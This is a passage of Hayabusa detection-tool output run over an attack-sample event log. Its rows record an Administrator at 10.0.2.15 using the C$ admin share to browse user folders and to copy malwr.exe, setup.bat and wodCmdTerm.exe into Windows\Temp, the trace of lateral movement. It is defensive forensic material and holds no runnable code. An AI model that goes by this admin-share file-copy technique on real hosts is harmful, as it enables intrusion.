10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 